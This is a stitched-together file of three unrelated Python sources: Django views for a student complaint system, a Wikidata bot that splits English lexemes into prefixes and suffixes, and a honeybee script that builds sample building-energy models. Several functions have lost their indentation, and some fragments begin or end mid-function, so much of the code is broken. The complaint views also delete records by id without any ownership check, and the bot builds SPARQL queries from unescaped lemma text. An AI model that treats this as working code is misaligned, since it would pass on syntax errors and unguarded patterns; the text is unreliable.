        if rate == 0:
            # First rating for this caretaker: use the submitted value as-is.
            newrate = rating
        else:
            # Integer average of the new rating and the current one.
            newrate = int((int(rating) + int(rate)) / 2)
        Caretaker.objects.select_related().filter(area=a.location).update(rating=newrate)
        return HttpResponseRedirect('/complaint/user/')
    else:
        a = StudentComplain.objects.get(id=complaint_id)
        return render(request, "complaintModule/submit_feedback.html", {'a': a})
@login_required
def deletecomplaint(request, comp_id1):
    """Delete the complaint with the given id and return to the
    caretaker dashboard."""
    complaint = StudentComplain.objects.get(id=comp_id1)
    complaint.delete()
    return HttpResponseRedirect('/complaint/caretaker/')
@login_required
def supervisor(request):
    """
    Show the supervisor dashboard: the area's caretakers, all complaints in
    the area, overdue complaints and the pending-complaint count.

    POST keeps its original defensive try/except around the Supervisor
    lookup; GET resolves it directly, exactly as before.

    Fix: the POST and GET branches previously duplicated ~25 identical
    lines; the shared work is factored into ``_supervisor_context``.
    """
    current_user = get_object_or_404(User, username=request.user.username)
    y = ExtraInfo.objects.all().filter(user=current_user).first()
    if request.method == 'POST':
        try:
            y = ExtraInfo.objects.get(id=y.id)
            a = Supervisor.objects.get(sup_id=y)
        except Exception as e:
            print(e)
            a = None
            y = None
    else:
        y = ExtraInfo.objects.get(id=y.id)
        a = Supervisor.objects.get(sup_id=y)
    return render(request, "complaintModule/supervisor1.html",
                  _supervisor_context(a))

def _supervisor_context(a):
    """Build the supervisor1.html template context for supervisor ``a``.

    Keeps the original every-other-row filtering (``j % 2``) which appears
    to compensate for duplicated rows — confirm against the data model.
    """
    all_caretaker = Caretaker.objects.filter(area=a.area).order_by('-id')
    area = all_caretaker[0].area
    numtemp = StudentComplain.objects.filter(location = area).filter(status = 0).count()
    # Halve the raw count, rounding up (rows are presumably stored twice).
    num = int(numtemp/2+0.5)
    all_complainttemp = StudentComplain.objects.filter(location=a.area).order_by('-id')
    all_complaint = [c for idx, c in enumerate(all_complainttemp) if idx % 2 == 0]
    overduecomplaint = []
    for i in all_complaint:
        # Status 2/3 mean resolved/declined; anything else past its
        # scheduled finish date counts as overdue.
        if i.status != 2 and i.status != 3:
            if i.complaint_finish < date.today():
                i.delay = date.today() - i.complaint_finish
                overduecomplaint.append(i)
    return {'all_caretaker': all_caretaker, 'all_complaint': all_complaint,
            'overduecomplaint': overduecomplaint, 'area': area, 'num': num}
@login_required
def caretaker_id_know_more(request, caretaker_id):
    """Show one caretaker's details plus the pending complaints in
    their area."""
    this_caretaker = Caretaker.objects.get(id = caretaker_id)
    pending_qs = StudentComplain.objects.filter(
        location = this_caretaker.area).filter(status = 0)
    # Keep every other row, mirroring the j % 2 filtering used elsewhere
    # in this module (rows appear to be stored twice — confirm).
    list_pending_complaints = [c for idx, c in enumerate(pending_qs)
                               if idx % 2 == 0]
    num = len(list_pending_complaints)
    return render(request, "complaintModule/caretaker_id_know_more.html",
                  {'this_caretaker': this_caretaker,
                   'list_pending_complaints': list_pending_complaints,
                   'num': num})
def search_complaint(request):
    """Complaint search is not implemented; send every visitor to login."""
    login_url = '/login/'
    return HttpResponseRedirect(login_url)
@login_required
def resolvepending(request, cid):
    """
    Let a caretaker confirm ('Yes' → status 2) or reject (→ status 3)
    the resolution of a pending complaint, notifying the complainant.
    GET renders the confirmation page instead.
    """
    a = get_object_or_404(User, username=request.user.username)
    y = ExtraInfo.objects.all().filter(user=a).first()
    thiscomplaint = StudentComplain.objects.get(id=cid)
    if request.method != 'POST':
        return render(request, "complaintModule/resolve_pending.html",
                      {"a": a, "thiscomplaint": thiscomplaint})
    answer = request.POST.get('yesorno', '')
    intstatus = 2 if answer == 'Yes' else 3
    StudentComplain.objects.filter(id=cid).update(status=intstatus)
    # Re-fetch so the notification sees the updated row.
    complainer_details = StudentComplain.objects.get(id=cid)
    complaint_system_notif(request.user, complainer_details.complainer.user,
                           'comp_resolved_alert')
    return HttpResponseRedirect("/complaint/caretaker/")
def login1(request):
    """
    Handle the complaint module's login form.

    POST: authenticate the submitted credentials; on success log the user
    in and redirect to the complaint home page, on unknown credentials
    return an error page.
    Any non-POST request is redirected to the login page.

    Fix: removed two dead DB queries (``User``/``ExtraInfo`` lookups whose
    results were never used) that could also 500 the login on a missing
    ExtraInfo row.
    """
    if request.method == 'POST':
        u = request.POST.get('username', '')
        p = request.POST.get('password', '')
        user = authenticate(username=u, password=p)
        if user is not None:
            if user.is_active:
                login(request, user)
                return HttpResponseRedirect('/complaint/')
            # NOTE(review): an inactive user falls through and the view
            # returns None (server error) — pre-existing behavior kept.
        else:
            return HttpResponse("<h1>wrong user credentials</h1>")
    else:
        return HttpResponseRedirect('/login/')
@login_required
def feedback_super(request, feedcomp_id):
    """Show the supervisor the feedback left on one complaint, together
    with the complainant's first complaint id and the area caretaker."""
    detail3 = StudentComplain.objects.get(id=feedcomp_id)
    complainer_user = User.objects.get(username=detail3.complainer.user.username)
    extra = ExtraInfo.objects.get(user=complainer_user)
    first_complaint = StudentComplain.objects.filter(complainer=extra).first()
    care = Caretaker.objects.filter(area=detail3.location).first()
    return render(request, "complaintModule/feedback_super.html",
                  {"detail3": detail3, "comp_id": first_complaint.id,
                   "care": care})
@login_required
def feedback_care(request, feedcomp_id):
    """Show the caretaker the feedback left on one complaint, together
    with the complainant's first complaint id."""
    detail2 = StudentComplain.objects.get(id=feedcomp_id)
    complainer_user = User.objects.get(username=detail2.complainer.user.username)
    extra = ExtraInfo.objects.get(user=complainer_user)
    first_complaint = StudentComplain.objects.filter(complainer=extra).first()
    return render(request, "complaintModule/feedback_care.html",
                  {"detail2": detail2, "comp_id": first_complaint.id})
@login_required
def detail(request, detailcomp_id1):
"""
function that shows detail about complaint
"""
detail = StudentComplain.objects.get(id=detailcomp_id1)
a=User.objects.get(username=detail.complainer.user.username)
y=ExtraInfo.objects.get(user=a)
num=0
if detail.upload_complaint != "":
num = 1
temp=StudentComplain.objects.filter(complainer=y).first()
| |
<reponame>siiptuo/kriobot
# SPDX-FileCopyrightText: 2021 <NAME>
# SPDX-License-Identifier: MIT
import argparse
import logging
import pickle
import random
import string
import sys
from datetime import datetime, timezone
from enum import Enum
from pathlib import Path
from random import Random
from typing import Callable, Dict, Optional, Sequence, cast
from wikibaseintegrator import wbi_core, wbi_datatype, wbi_functions
from common import create_login_instance
def random_string(n):
    """Return ``n`` random ASCII letters (not cryptographically secure)."""
    letters = string.ascii_letters
    return "".join(random.choice(letters) for _ in range(n))
def format_list(items):
    """
    Join two or more items with commas and a final "and".

    >>> format_list(['A', 'B'])
    'A and B'
    >>> format_list(['A', 'B', 'C'])
    'A, B and C'
    """
    assert len(items) >= 2
    *head, last = items
    return f"{', '.join(head)} and {last}"
class Language(Enum):
    """Wikidata QIDs of the languages this bot processes."""
    ENGLISH = "Q1860"
    SWEDISH = "Q9027"
class LexicalCategory(Enum):
    """Wikidata QIDs of the lexical categories (parts of speech) used."""
    ADJ = "Q34698"
    NOUN = "Q1084"
    VERB = "Q24905"
    ADVERB = "Q380057"
class LexemeType(Enum):
    """Wikidata QIDs of special lexeme types a Result may declare."""
    VERBAL_NOUN = "Q1350145"
    ABSOLUTE_ADJ = "Q332375"
    AGENT_NOUN = "Q1787727"
class Lexeme:
    """A Wikidata lexeme: its L-id plus optional lemma and category."""

    def __init__(self, qid, lemma=None, category: Optional["LexicalCategory"] = None):
        # Accept both full entity URIs (as returned by SPARQL) and bare L-ids.
        self.qid = qid.removeprefix("http://www.wikidata.org/entity/")
        self.lemma = lemma
        self.category = category

    def __str__(self):
        return "Lexeme({}, {}, {})".format(self.qid, self.lemma, self.category)
HistoryDict = Dict[str, tuple[datetime, bool]]

class History:
    """
    Remembers previously processed lexemes:

    - Successfully matched lexemes are skipped forever, so human corrections
      are never overwritten by the bot.
    - Unmatched lexemes are retried after a randomized cool-down period,
      which reduces repeated queries.
    """

    def __init__(self, filename: str):
        storage_dir = Path("history")
        storage_dir.mkdir(exist_ok=True)
        self.path = storage_dir / filename
        try:
            self.items: HistoryDict = pickle.loads(self.path.read_bytes())
        except FileNotFoundError:
            self.items = {}
        # Unmatched results are buffered here and merged into the pickle
        # only on exit, so several tasks may try the same lexeme in one run.
        self.changes: HistoryDict = {}

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        merged = {**self.items, **self.changes}
        self.path.write_bytes(pickle.dumps(merged))

    def add(self, lexeme: "Lexeme", matched: bool, now: Optional[datetime] = None):
        """Record one attempt; matched entries take effect immediately."""
        if now is None:
            now = datetime.now(timezone.utc)
        # Matched lexemes go straight into ``items`` so they are never
        # processed twice within the same run.
        target = self.items if matched else self.changes
        target[lexeme.qid] = (now, matched)

    def __contains__(self, lexeme) -> bool:
        try:
            last_checked, matched = self.items[lexeme.qid]
        except KeyError:
            return False
        if matched:
            return True
        # Deterministic per-lexeme cool-down of 14-28 days.
        rng = Random(f"{lexeme.qid} {last_checked}")
        age_days = (datetime.now(timezone.utc) - last_checked).days
        return age_days < rng.randint(14, 28)
class Result:
    """The decomposition proposed for one lexeme: the lexeme itself, its
    parts (``None`` marks an unresolved part) and optional lexeme types."""

    def __init__(
        self,
        lexeme: "Lexeme",
        parts: Sequence[Optional["Lexeme"]],
        types: Sequence["LexemeType"] = None,
    ):
        self.lexeme = lexeme
        self.parts = parts
        # Normalize so callers can always iterate ``types``.
        self.types = [] if types is None else types
class Task:
    """One matching task: searches Wikidata for lexemes of a given language
    and category set, and proposes how each decomposes via ``transform``."""

    def __init__(
        self,
        language: Language,
        categories: Sequence[LexicalCategory],
        transform: Callable[[str], Result],
        include=None,
        exclude=None,
        name=None,
    ):
        # ``include``/``exclude`` are regex fragments applied to the lemma
        # inside the SPARQL query.
        self.language = language
        self.categories = categories
        # NOTE(review): annotated Callable[[str], Result] but ``execute``
        # passes a Lexeme — the annotation looks wrong; confirm.
        self.transform = transform
        self.include = include
        self.exclude = exclude
        self.name = name

    def _search_lexemes(self, limit: int):
        """Query Wikidata for candidate lexemes (without existing
        combines/P5238 claims), returned in randomized order."""
        query = "SELECT ?lexeme ?lemma ?category WHERE {\n"
        query += f" ?lexeme dct:language wd:{self.language.value};\n"
        query += f" wikibase:lexicalCategory ?category;\n"
        query += " wikibase:lemma ?lemma.\n"
        query += (
            " FILTER(?category IN ("
            + ",".join(f"wd:{category.value}" for category in self.categories)
            + "))\n"
        )
        if self.include:
            query += f' FILTER(REGEX(?lemma, "{self.include}"))\n'
        if self.exclude:
            query += f' FILTER(!REGEX(?lemma, "{self.exclude}"))\n'
        # Ignore lexemes with existing combines (P5238) claims. These might be
        # previously added by this bot or humans.
        query += " MINUS { ?lexeme wdt:P5238 []. }\n"
        # Randomize rows using custom randomization instead of RAND function.
        # This will make it sure that the order is really random and embedding
        # a random string to the query will bypass any caching. For more
        # information, see https://byabbe.se/2020/09/17/getting-random-results-in-sparql
        random = random_string(10)  # NOTE: shadows the ``random`` module locally
        query += f' BIND(SHA512(CONCAT("{random}", STR(?lexeme))) AS ?random)\n'
        query += "}\n"
        query += f"ORDER BY ?random\n"
        # Query extra lexemes to fill the limit because some lexemes may be
        # skipped later if no matching lexeme is found.
        query += f"LIMIT {10*limit}"
        data = wbi_functions.execute_sparql_query(query)
        lexemes = []
        for row in data["results"]["bindings"]:
            lexemes.append(
                Lexeme(
                    row["lexeme"]["value"],
                    row["lemma"]["value"],
                    LexicalCategory(
                        row["category"]["value"].removeprefix(
                            "http://www.wikidata.org/entity/"
                        )
                    ),
                )
            )
        return lexemes

    def execute(self, limit: int, history: History):
        """Yield up to ``limit`` fully matched Results, recording every
        attempt (matched or not) in ``history``."""
        i = 0
        for lexeme in self._search_lexemes(limit):
            if i == limit:
                break
            if lexeme in history:
                # Matched before, or retried too recently: skip.
                continue
            result = self.transform(lexeme)
            # Yield only when every part resolved to an actual lexeme.
            if result.parts and all(result.parts):
                yield result
                i += 1
                history.add(lexeme, matched=True)
            else:
                history.add(lexeme, matched=False)
tasks = []

def task(**kwargs):
    """Decorator factory that registers the decorated transform function
    as a :class:`Task` in the module-level ``tasks`` list.

    Fix: ``inner`` previously returned ``None``, so every decorated module
    name (``en_un_adj`` etc.) was rebound to ``None``; it now returns the
    function, as a decorator should.
    """
    def inner(fn):
        tasks.append(Task(name=fn.__name__, **kwargs, transform=fn))
        return fn
    return inner
def find_lexeme(
    lemma: str, language: Language, categories: list[LexicalCategory]
) -> Optional[Lexeme]:
    """Search a single lexeme with the specified lemma.

    Returns the Lexeme only when exactly one lexeme in the given language
    and categories has that lemma; otherwise returns None.
    """
    cats = ", ".join(f"wd:{cat.value}" for cat in categories)
    query = "SELECT ?lexeme ?category WHERE {\n"
    query += f" ?lexeme dct:language wd:{language.value};\n"
    query += f" wikibase:lexicalCategory ?category;\n"
    query += " wikibase:lemma ?lemma.\n"
    query += f' FILTER(?category IN ({cats}) && STR(?lemma) = "{lemma}")\n'
    query += "}\n"
    # LIMIT 2 is enough to detect an ambiguous (multi-result) match.
    query += "LIMIT 2"
    data = wbi_functions.execute_sparql_query(query)
    results = data["results"]["bindings"]
    # To play it safe, let's continue only if we found a single lexeme.
    if len(results) != 1:
        return None
    qid = results[0]["lexeme"]["value"]
    category = LexicalCategory(
        results[0]["category"]["value"].removeprefix("http://www.wikidata.org/entity/")
    )
    return Lexeme(qid, lemma, category)
# "unbounded" → "un-" + "bounded"
# "underived" → "un-" + "derived"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.ADJ],
include="^un...",
)
def en_un_adj(lexeme: Lexeme) -> Result:
parts = [
Lexeme("L15649", "un-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("un"),
language=Language.ENGLISH,
categories=[LexicalCategory.ADJ],
),
]
return Result(lexeme=lexeme, parts=parts)
# "unbox" → "un-" + "box"
# "underive" → "un-" + "derive"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.VERB],
include="^un...",
)
def en_un_verb(lexeme: Lexeme) -> Result:
parts = [
Lexeme("L15649", "un-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("un"),
language=Language.ENGLISH,
categories=[LexicalCategory.VERB],
),
]
return Result(lexeme=lexeme, parts=parts)
# "defuse" → "de-" + "fuse"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.VERB],
include="^de......",
)
def en_de_verb(lexeme: Lexeme) -> Result:
parts = [
Lexeme("L35199", "de-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("de"),
language=Language.ENGLISH,
categories=[LexicalCategory.VERB],
),
]
return Result(lexeme=lexeme, parts=parts)
# "disconnect" → "dis-" + "connect"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.VERB],
include="^dis......",
)
def en_dis_verb(lexeme: Lexeme) -> Result:
parts = [
Lexeme("L29593", "dis-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("dis"),
language=Language.ENGLISH,
categories=[LexicalCategory.VERB],
),
]
return Result(lexeme=lexeme, parts=parts)
# "misunderstand" → "mis-" + "understand"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.VERB],
include="^mis......",
)
def en_mis_verb(lexeme: Lexeme) -> Result:
parts = [
Lexeme("L613650", "mis-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("mis"),
language=Language.ENGLISH,
categories=[LexicalCategory.VERB],
),
]
return Result(lexeme=lexeme, parts=parts)
# "antioxidant" → "anti-" + "oxidant"
# "anticlimactic" → "anti-" + "climactic"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.NOUN, LexicalCategory.ADJ],
include="^anti-?......",
)
def en_anti(lexeme: Lexeme) -> Result:
assert lexeme.category is not None
parts = [
Lexeme("L29591", "anti-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("anti").removeprefix("-"),
language=Language.ENGLISH,
categories=[lexeme.category],
),
]
return Result(lexeme=lexeme, parts=parts)
# "counterculture" → "counter-" + "culture"
# "counterclockwise" → "counter-" + "clockwise"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.NOUN, LexicalCategory.ADJ],
include="^counter-?......",
)
def en_counter(lexeme: Lexeme) -> Result:
assert lexeme.category is not None
parts = [
Lexeme("L36419", "counter-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("counter").removeprefix("-"),
language=Language.ENGLISH,
categories=[lexeme.category],
),
]
return Result(lexeme=lexeme, parts=parts)
# "contradistinction" → "contra-" + "distinction"
# "contralateral" → "contra-" + "lateral"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.NOUN, LexicalCategory.ADJ],
include="^contra-?......",
)
def en_contra(lexeme: Lexeme) -> Result:
assert lexeme.category is not None
parts = [
Lexeme("L36418", "contra-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("contra").removeprefix("-"),
language=Language.ENGLISH,
categories=[lexeme.category],
),
]
return Result(lexeme=lexeme, parts=parts)
# "protohistory" → "proto-" + "history"
# "protoacademic" → "proto-" + "academic"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.NOUN, LexicalCategory.ADJ],
include="^proto-?......",
)
def en_proto(lexeme: Lexeme) -> Result:
assert lexeme.category is not None
parts = [
Lexeme("L615092", "proto-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("proto").removeprefix("-"),
language=Language.ENGLISH,
categories=[lexeme.category],
),
]
return Result(lexeme=lexeme, parts=parts)
# "overlook" → "over-" + "look"
# "overkind" → "over-" + "kind"
# "overlord" → "over-" + "lord"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.VERB, LexicalCategory.ADJ, LexicalCategory.NOUN],
include="^over-?...",
)
def en_over(lexeme: Lexeme) -> Result:
assert lexeme.category is not None
parts = [
Lexeme("L618499", "over-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("over").removeprefix("-"),
language=Language.ENGLISH,
categories=[lexeme.category],
),
]
return Result(lexeme=lexeme, parts=parts)
# "restless" → "rest" + "-less"
@task(language=Language.ENGLISH, categories=[LexicalCategory.ADJ], include="...less$")
def en_less(lexeme: Lexeme) -> Result:
parts = [
find_lexeme(
lemma=lexeme.lemma.removesuffix("less"),
language=Language.ENGLISH,
categories=[LexicalCategory.NOUN],
),
Lexeme("L303186", "-less"),
]
return Result(lexeme=lexeme, parts=parts)
# "awkwardness" → "awkward" + "-ness"
# "happiness" → "happy" + "-ness"
@task(language=Language.ENGLISH, categories=[LexicalCategory.NOUN], include="...ness$")
def en_ness(lexeme: Lexeme) -> Result:
lemma = lexeme.lemma.removesuffix("ness")
if lemma[-1] == "i":
lemma = lemma[:-1] + "y"
parts = [
find_lexeme(
lemma=lemma,
language=Language.ENGLISH,
categories=[LexicalCategory.ADJ],
),
Lexeme("L269834", "-ness"),
]
return Result(lexeme=lexeme, parts=parts)
# "guitarist" → "guitar" + "-ist"
# "surrealist" → "surreal" + "-ist"
@task(language=Language.ENGLISH, categories=[LexicalCategory.NOUN], include="...ist$")
def en_ist(lexeme: Lexeme) -> Result:
parts = [
find_lexeme(
lemma=lexeme.lemma.removesuffix("ist"),
language=Language.ENGLISH,
categories=[LexicalCategory.NOUN, LexicalCategory.ADJ],
),
Lexeme("L29847", "-ist"),
]
return Result(lexeme=lexeme, parts=parts, types=[LexemeType.AGENT_NOUN])
# "alcoholism" → "alcohol" + "-ism"
# "surrealism" → "surreal" + "-ism"
@task(language=Language.ENGLISH, categories=[LexicalCategory.NOUN], include="...ism$")
def en_ism(lexeme: Lexeme) -> Result:
parts = [
find_lexeme(
lemma=lexeme.lemma.removesuffix("ism"),
language=Language.ENGLISH,
categories=[LexicalCategory.NOUN, LexicalCategory.ADJ],
),
Lexeme("L29596", "-ism"),
]
return Result(lexeme=lexeme, parts=parts)
# "peaceful" → "peace" + "-ful"
# "beautiful" → "beauty" + "-ful"
@task(language=Language.ENGLISH, categories=[LexicalCategory.ADJ], include="...ful$")
def en_ful_adj(lexeme: Lexeme) -> Result:
lemma = lexeme.lemma.removesuffix("ful")
if lemma[-1] == "i":
lemma = lemma[:-1] + "y"
parts = [
find_lexeme(
lemma=lemma,
language=Language.ENGLISH,
categories=[LexicalCategory.NOUN],
),
Lexeme("L7893", "-ful"),
]
return Result(lexeme=lexeme, parts=parts)
# "handful" → "hand" + "-ful"
@task(language=Language.ENGLISH, categories=[LexicalCategory.NOUN], include="...ful$")
def en_ful_noun(lexeme: Lexeme) -> Result:
parts = [
find_lexeme(
lemma=lexeme.lemma.removesuffix("ful"),
language=Language.ENGLISH,
categories=[LexicalCategory.NOUN],
),
Lexeme("L592127", "-ful"),
]
return | |
# coding=utf-8
from honeybee.model import Model
from honeybee.room import Room
from honeybee.face import Face
from honeybee.shade import Shade
from honeybee.aperture import Aperture
from honeybee.door import Door
from honeybee.boundarycondition import boundary_conditions
from honeybee.facetype import face_types, Floor, RoofCeiling
from honeybee_energy.constructionset import ConstructionSet
from honeybee_energy.construction.opaque import OpaqueConstruction
from honeybee_energy.construction.window import WindowConstruction
from honeybee_energy.construction.shade import ShadeConstruction
from honeybee_energy.material.opaque import EnergyMaterial
from honeybee_energy.schedule.fixedinterval import ScheduleFixedInterval
from honeybee_energy.schedule.ruleset import ScheduleRuleset
from honeybee_energy.load.setpoint import Setpoint
from honeybee_energy.ventcool.opening import VentilationOpening
from honeybee_energy.ventcool.control import VentilationControl
from honeybee_energy.ventcool import afn
from honeybee_energy.ventcool.simulation import VentilationSimulationControl
from honeybee_energy.hvac.allair.vav import VAV
from honeybee_energy.hvac.doas.fcu import FCUwithDOAS
from honeybee_energy.hvac.heatcool.windowac import WindowAC
import honeybee_energy.lib.programtypes as prog_type_lib
import honeybee_energy.lib.scheduletypelimits as schedule_types
from honeybee_energy.lib.materials import clear_glass, air_gap, roof_membrane, \
wood, insulation
from honeybee_energy.lib.constructions import generic_exterior_wall, \
generic_interior_wall, generic_interior_floor, generic_interior_ceiling, \
generic_double_pane
from honeybee_radiance.modifierset import ModifierSet
from honeybee_radiance.modifier.material import Glass, Plastic, Trans
from honeybee_radiance.dynamic import RadianceShadeState, RadianceSubFaceState, \
StateGeometry
from ladybug_geometry.geometry3d.pointvector import Point3D, Vector3D
from ladybug_geometry.geometry3d.plane import Plane
from ladybug_geometry.geometry3d.face import Face3D
from ladybug_geometry.geometry3d.polyface import Polyface3D
import os
import json
import random
def model_complete_single_zone_office(directory):
    """Write the 'model_complete_single_zone_office.json' sample: a single
    office room with mass floor, shelved south glazing, a north door and
    triple-pane window, plus tree-canopy and table context shades."""
    office = Room.from_box('Tiny_House_Office', 5, 10, 3)
    office.properties.energy.program_type = prog_type_lib.office_program
    office.properties.energy.add_default_ideal_air()

    # Heavy stone floor construction for thermal mass.
    stone = EnergyMaterial('Thick Stone', 0.3, 2.31, 2322, 832, 'Rough',
                           0.95, 0.75, 0.8)
    mass_floor = OpaqueConstruction('Thermal Mass Floor', [stone])
    office[0].properties.energy.construction = mass_floor

    # South wall: 40% glazing with indoor + outdoor light shelves.
    south = office[3]
    south.apertures_by_ratio(0.4, 0.01)
    south.apertures[0].overhang(0.5, indoor=False)
    south.apertures[0].overhang(0.5, indoor=True)
    south.move_shades(Vector3D(0, 0, -0.5))
    shelf_out = ShadeConstruction('Outdoor_Light_Shelf', 0.5, 0.5)
    shelf_in = ShadeConstruction('Indoor_Light_Shelf', 0.7, 0.7)
    south.apertures[0].outdoor_shades[0].properties.energy.construction = shelf_out
    south.apertures[0].indoor_shades[0].properties.energy.construction = shelf_in

    # North wall: overhang, a front door and a triple-pane window.
    north = office[1]
    north.overhang(0.25, indoor=False)
    door_pts = [Point3D(2, 10, 0.1), Point3D(1, 10, 0.1),
                Point3D(1, 10, 2.5), Point3D(2, 10, 2.5)]
    north.add_door(Door('Front_Door', Face3D(door_pts)))
    window_pts = [Point3D(4.5, 10, 1), Point3D(2.5, 10, 1),
                  Point3D(2.5, 10, 2.5), Point3D(4.5, 10, 2.5)]
    window = Aperture('Front_Aperture', Face3D(window_pts))
    triple_glazing = WindowConstruction(
        'Triple Pane Window', [clear_glass, air_gap, clear_glass, air_gap, clear_glass])
    window.properties.energy.construction = triple_glazing
    north.add_aperture(window)

    # Context shades: a tree canopy outdoors and a table indoors.
    canopy_geo = Face3D.from_regular_polygon(
        6, 2, Plane(Vector3D(0, 0, 1), Point3D(5, -3, 4)))
    canopy = Shade('Tree_Canopy', canopy_geo)
    table = Shade('Table', Face3D.from_rectangle(2, 2, Plane(o=Point3D(1.5, 4, 1))))
    office.add_indoor_shade(table)

    model = Model('Tiny_House', [office], orphaned_shades=[canopy])
    out_path = os.path.join(directory, 'model_complete_single_zone_office.json')
    with open(out_path, 'w') as f:
        json.dump(model.to_dict(), f, indent=4)
def model_complete_single_zone_office_user_data(directory):
    """Write 'model_complete_user_data.json': the single-zone office model
    with ``user_data`` entries patched into its serialized dictionary at the
    model, room, face, aperture, door and shade levels.

    Fix: the function previously dumped ``model.to_dict()`` — a fresh
    serialization — which silently discarded every ``user_data`` entry it
    had just added to ``model_dict``; the patched dictionary is now written.
    """
    room = Room.from_box('Tiny_House_Office', 5, 10, 3)
    room.properties.energy.program_type = prog_type_lib.office_program
    room.properties.energy.add_default_ideal_air()
    # South wall: glazing with indoor + outdoor light shelves.
    south_face = room[3]
    south_face.apertures_by_ratio(0.4, 0.01)
    south_face.apertures[0].overhang(0.5, indoor=False)
    south_face.apertures[0].overhang(0.5, indoor=True)
    south_face.move_shades(Vector3D(0, 0, -0.5))
    light_shelf_out = ShadeConstruction('Outdoor_Light_Shelf', 0.5, 0.5)
    light_shelf_in = ShadeConstruction('Indoor_Light_Shelf', 0.7, 0.7)
    south_face.apertures[0].outdoor_shades[0].properties.energy.construction = light_shelf_out
    south_face.apertures[0].indoor_shades[0].properties.energy.construction = light_shelf_in
    # North wall: overhang, door and aperture.
    north_face = room[1]
    north_face.overhang(0.25, indoor=False)
    door_verts = [Point3D(2, 10, 0.1), Point3D(1, 10, 0.1),
                  Point3D(1, 10, 2.5), Point3D(2, 10, 2.5)]
    door = Door('Front_Door', Face3D(door_verts))
    north_face.add_door(door)
    aperture_verts = [Point3D(4.5, 10, 1), Point3D(2.5, 10, 1),
                      Point3D(2.5, 10, 2.5), Point3D(4.5, 10, 2.5)]
    aperture = Aperture('Front_Aperture', Face3D(aperture_verts))
    north_face.add_aperture(aperture)
    model = Model('Tiny_House', [room])
    # Patch user_data into the serialized dictionary at several levels.
    model_dict = model.to_dict()
    model_dict['user_data'] = {'site': 'The backyard'}
    model_dict['rooms'][0]['user_data'] = {'alt_name': 'Little old tiny house'}
    model_dict['rooms'][0]['faces'][0]['user_data'] = {'alt_name': 'The floor'}
    model_dict['rooms'][0]['faces'][3]['apertures'][0]['user_data'] = \
        {'alt_name': 'Picture window'}
    model_dict['rooms'][0]['faces'][1]['doors'][0]['user_data'] = \
        {'alt_name': 'Front door'}
    model_dict['rooms'][0]['faces'][3]['apertures'][0]['outdoor_shades'][0]['user_data'] = \
        {'alt_name': 'Awning'}
    dest_file = os.path.join(directory, 'model_complete_user_data.json')
    with open(dest_file, 'w') as fp:
        json.dump(model_dict, fp, indent=4)
def model_complete_multi_zone_office(directory):
    """Write a 3-room house Model (two office floors + gabled attic) to JSON.

    The result lands in ``<directory>/model_complete_multi_zone_office.json``.
    """
    first_floor = Room.from_box('First_Floor', 10, 10, 3, origin=Point3D(0, 0, 0))
    second_floor = Room.from_box('Second_Floor', 10, 10, 3, origin=Point3D(0, 0, 3))
    first_floor.properties.energy.program_type = prog_type_lib.office_program
    second_floor.properties.energy.program_type = prog_type_lib.office_program
    first_floor.properties.energy.add_default_ideal_air()
    second_floor.properties.energy.add_default_ideal_air()
    # glaze the four walls (faces 1-4) of both box-shaped floors
    for face in first_floor[1:5]:
        face.apertures_by_ratio(0.2, 0.01)
    for face in second_floor[1:5]:
        face.apertures_by_ratio(0.2, 0.01)
    # attic geometry: flat floor at z=6, two sloped roof planes meeting in a
    # ridge at z=9, and two triangular gable ends
    pts_1 = [Point3D(0, 0, 6), Point3D(0, 10, 6), Point3D(10, 10, 6), Point3D(10, 0, 6)]
    pts_2 = [Point3D(0, 0, 6), Point3D(5, 0, 9), Point3D(5, 10, 9), Point3D(0, 10, 6)]
    pts_3 = [Point3D(10, 0, 6), Point3D(10, 10, 6), Point3D(5, 10, 9), Point3D(5, 0, 9)]
    pts_4 = [Point3D(0, 0, 6), Point3D(10, 0, 6), Point3D(5, 0, 9)]
    pts_5 = [Point3D(10, 10, 6), Point3D(0, 10, 6), Point3D(5, 10, 9)]
    face_1 = Face('AtticFace1', Face3D(pts_1))
    face_2 = Face('AtticFace2', Face3D(pts_2))
    face_3 = Face('AtticFace3', Face3D(pts_3))
    face_4 = Face('AtticFace4', Face3D(pts_4))
    face_5 = Face('AtticFace5', Face3D(pts_5))
    # trailing 0.01 / 1 presumably model tolerance and angle tolerance — TODO confirm
    attic = Room('Attic', [face_1, face_2, face_3, face_4, face_5], 0.01, 1)
    # attic-specific constructions; roof_membrane, wood and insulation are
    # module-level material objects defined elsewhere in this file
    constr_set = ConstructionSet('Attic Construction Set')
    polyiso = EnergyMaterial('PolyIso', 0.2, 0.03, 43, 1210, 'MediumRough')
    roof_constr = OpaqueConstruction('Attic Roof Construction',
                                     [roof_membrane, polyiso, wood])
    floor_constr = OpaqueConstruction('Attic Floor Construction',
                                      [wood, insulation, wood])
    constr_set.floor_set.interior_construction = floor_constr
    constr_set.roof_ceiling_set.exterior_construction = roof_constr
    attic.properties.energy.construction_set = constr_set
    # pair up the interior faces between the stacked rooms before export
    Room.solve_adjacency([first_floor, second_floor, attic], 0.01)
    model = Model('Multi_Zone_Single_Family_House', [first_floor, second_floor, attic])
    dest_file = os.path.join(directory, 'model_complete_multi_zone_office.json')
    with open(dest_file, 'w') as fp:
        json.dump(model.to_dict(), fp, indent=4)
def model_complete_patient_room(directory):
    """Write a hospital ICU patient-room Model to model_complete_patient_room.json."""
